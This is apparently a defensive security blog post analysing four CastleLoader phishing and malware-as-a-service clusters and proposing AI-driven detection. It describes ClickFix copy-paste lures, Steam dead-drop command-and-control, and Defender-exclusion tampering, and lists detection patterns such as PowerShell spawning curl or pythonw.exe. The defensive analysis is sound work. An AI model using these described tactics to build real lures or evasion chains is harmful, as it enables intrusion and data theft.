AI Defense Against CastleLoader Phishing Clusters

GrayBravo didn’t just build malware. It built a repeatable business.

In late 2025, threat intelligence teams tracked GrayBravo (previously TAG-150) as it expanded fast, shifted tactics when exposed, and operated a sprawling, multi-tier infrastructure. The detail that should make defenders sit up: researchers identified four distinct activity clusters using GrayBravo’s CastleLoader—each with different lures, infrastructure patterns, and “customer-like” behaviors. That’s the operational footprint you expect when a group is running a malware-as-a-service (MaaS) ecosystem.

This matters because CastleLoader isn’t the end of the story. It’s a delivery layer. Once it lands, it can bring in credential stealers, remote access trojans (RATs), or other loaders—meaning a single click can become ransomware, business email compromise, cargo theft, or quiet long-term access.

Why GrayBravo’s clusters are a warning sign

GrayBravo’s CastleLoader activity is a warning sign because it shows how quickly modern initial access evolves when a MaaS platform gets traction.

Traditional security planning assumes: one actor, one campaign, one set of indicators. GrayBravo flips that. You’re dealing with:

• Multiple operators using the same loader
• Different phishing themes (logistics vs. hospitality)
• Different delivery channels (phishing, ClickFix, malvertising, fake software updates)
• Shared enabling infrastructure patterns (multi-tier C2, bulletproof hosting ecosystems, legitimate internet services used as cover)

When a loader becomes “popular,” defenders lose the comfort of stable signatures. The reliable signal shifts from specific hashes to behavioral patterns: how domains are registered, how redirects are generated, how commands are executed, how C2 redundancy works, and how victims are selected.

The operational pattern defenders should internalize

Here’s the pattern I’ve seen repeatedly when a MaaS ecosystem matures:

1. The loader stabilizes (CastleLoader becomes the “product”).
2. Affiliates diversify lures (logistics quotes, Booking.com messages, software installers).
3. Infrastructure becomes layered (tiers, backups, redundancy).
4. Defense evasion becomes productized (signed installers, “legitimate” services as dead drops).

That’s not just a technical evolution. It’s a scaling strategy.

The ClickFix problem: social engineering that exploits your tools

ClickFix-style attacks work because they turn a victim into an execution engine.

Instead of exploiting a browser zero-day, the attacker convinces a user to copy/paste a command (often PowerShell) and run it under the pretense of “fixing access” or “completing verification.” It’s effective because it bypasses a lot of classic email defenses:

• The email can look normal (no attachment).
• The landing page can look normal (brand logos, plausible workflow).
• The malicious act happens when the user runs a command.

GrayBravo-linked clusters used ClickFix to deliver CastleLoader and other payloads—sometimes chaining into additional malware families like infostealers and RATs.

Why AI helps here (and rule-only defenses struggle)

Static rules can catch some ClickFix pages, but operators constantly adjust wording, page layouts, domains, and redirect chains.

AI-based detection does better when it’s trained to recognize the intent of the interaction. Specifically:

• Natural language patterns common to ClickFix (“copy and paste,” “run in PowerShell,” “verification steps,” “token missing,” “link expiring soon”)
• Page behavior (form submit → instruction overlay → command reveal)
• Execution telemetry correlation (browser activity followed by PowerShell spawning curl, tar, pythonw.exe, or Defender exclusion changes)

A practical stance: if you’re still treating phishing as a pure “email gateway” problem, you’ll keep losing to ClickFix. You need browser, endpoint, and identity telemetry stitched together—and AI is often the only realistic way to do that at scale.

What the four CastleLoader clusters tell us about real-world targeting

These clusters aren’t just “interesting.” They show how attackers tailor operations to industries and workflows.

Cluster 1 (logistics): lures that match how freight actually works

The logistics-focused cluster (tracked as TAG-160) impersonated logistics firms, spoofed emails, and abused freight-matching platforms. The lure style is brutally practical: rate confirmations, freight quotes, and urgency (“link will expire”).

This is targeted phishing that understands operations. It also reflects a broader trend security teams in logistics have been dealing with: cybercrime that directly enables physical theft (shipment hijacking, fraudulent pickups, and payment diversion).

Where AI earns its keep in this scenario:

• Vendor and sender verification at scale: models can learn normal freight partner communication patterns (domains, sending cadence, phrasing, file/link patterns).
• Anomaly detection on platform workflows: when accounts on freight platforms behave differently (new accounts contacting many carriers, unusual message templates, abnormal login geographies).
• Thread and relationship analysis: detecting when a “new conversation” mimics a known vendor but lacks the usual context, reply chain, or historical relationship.

Cluster 2 (Booking.com): phishing operations with a management stack

The Booking.com-themed cluster (TAG-161) is notable because it wasn’t just sending emails; it had dedicated phishing email management tooling—panels for redirects, SMTP pools, proxy configuration, templating, and stats.

That tells you this isn’t a one-off phisher. It’s a campaign operator optimizing for throughput.

AI-driven threat intelligence shines here by clustering infrastructure and behavior:

• Grouping domains by registration fingerprints and hosting ranges
• Identifying redirect generation patterns
• Spotting shared naming conventions across campaigns
• Surfacing new infrastructure quickly when the actor rotates domains

If you want a crisp one-liner to align your team: MaaS isn’t dangerous because it exists; it’s dangerous because it turns good operators into scalable operators.

Cluster 3 (Booking.com again): dead drops on legitimate platforms

A separate Booking.com impersonation cluster used Steam Community profiles as a dead drop resolver—an approach that helps attackers change C2 targets without shipping new binaries.

This is the kind of tactic that breaks “block the domain” playbooks. The domain you block today may not be the domain the malware uses tomorrow.

AI helps by focusing on:

• Graph relationships (which endpoints contacted which Steam profiles, which domains were resolved after those lookups)
• Sequence analysis (browser → PowerShell → repeated Defender exclusion attempts → loader execution)
• Outlier detection (endpoints that suddenly start interacting with unusual legitimate services in rare ways)

Cluster 4 (malvertising + fake installers): signed malware is the new normal

The malvertising/fake software update cluster distributed CastleLoader via fake repositories and electronically signed MSI installers, including builds associated with Extended Validation certificates.

This is where many organizations still get it wrong: they treat “signed” as “safe.”

Signed software can be malicious. What matters is:

• Who signed it (reputation, history)
• Where it came from (distribution channel)
• What it does after launch (process tree, network beacons, file writes)

AI-based endpoint analytics is good at detecting this because it can compare installers against baselines: normal installer behavior doesn’t typically involve suspicious outbound beacons, rapid follow-on script execution, or unusual persistence actions.

Turning threat intel into AI action: a practical playbook

Most teams collect intelligence. Fewer teams operationalize it.

Here’s a pragmatic way to turn this kind of CastleLoader reporting into measurable defense improvements.

1) Build “phishing intent” detection, not just URL detection

Answer first: Detect the instruction pattern, not only the destination.

Add detections for:

• Pages that instruct users to copy/paste commands
• Emails that create urgency around expiring links + document viewing
• Branded flows that suddenly require “manual verification steps”

AI/NLP can score messages and pages for these patterns, then route them to stepped-up controls (sandboxing, link isolation, user challenge flows).

2) Correlate browser-to-endpoint execution chains

Answer first: ClickFix becomes obvious when you connect the dots.

High-confidence correlation patterns include:

• A user visits a newly-seen domain → within minutes PowerShell runs
• PowerShell downloads archives or scripts → execution via pythonw.exe or .NET loaders
• Defender exclusions are modified repeatedly or via unusual loops

This is where machine learning-based correlation (or at least strong graph analytics) beats siloed alerts.

3) Use AI to maintain infrastructure blocklists without burning out analysts

Answer first: IoCs decay fast; infrastructure behavior doesn’t.

Instead of asking analysts to chase every new domain, train models (or use vendor AI) to automatically:

• Cluster domains by DNS/WHOIS/hosting patterns
• Detect “typosquat + brand + workflow keyword” combinations
• Flag suspicious use of specific hosting ecosystems associated with repeated abuse

Then gate that intelligence into:

• Secure web gateways / DNS filtering
• Email security policies
• EDR network prevention

4) Monitor “unusual legitimate internet services” usage

Answer first: Attackers love hiding in normal-looking services.

If you only look for obviously malicious domains, you’ll miss:

• Dead drops hosted on community/profile platforms
• Payload staging on file-sharing services
• Paste-style services used for configuration or redirects

AI helps by learning your organization’s normal usage of these services and flagging deviations (new endpoints, odd request patterns, unusual timing).

People also ask: “If this is MaaS, why don’t we see clear ads?”

You don’t need public advertisements to have a MaaS ecosystem.

Some operators sell via private relationships, closed forums, invite-only channels, or “service-like” partnerships where the same developer runs the backend while multiple affiliates run campaigns. The practical point for defenders is unchanged: expect multiple clusters, not one campaign, and plan detections accordingly.

What to do next if you’re defending against CastleLoader-style threats

If you want to reduce risk quickly, focus on controls that break the chain early.

1. Disable or restrict unnecessary script execution (especially PowerShell for non-admin users).
2. Harden email + browser isolation for high-risk roles (finance, operations, dispatch, customer service).
3. Deploy behavior-based EDR detections for:
   • suspicious archive downloads followed by execution
   • rapid Defender exclusion modifications
   • uncommon parent/child process trees (Office/browser → PowerShell → interpreter)
4. Run a tabletop exercise specifically for ClickFix: what happens when a user runs a pasted command?

For teams actively building an AI in cybersecurity program, this is an ideal use case: the signals are multi-source, noisy, and fast-changing—exactly where AI-driven detection and triage consistently outperforms manual-only workflows.

GrayBravo’s CastleLoader clusters are a reminder that attackers are scaling operations like a business. Defenders need to respond the same way: treat detections as products, automate what can be automated, and use AI where humans simply can’t keep up.

What part of your environment would fail first in a ClickFix scenario—email controls, endpoint controls, or identity controls?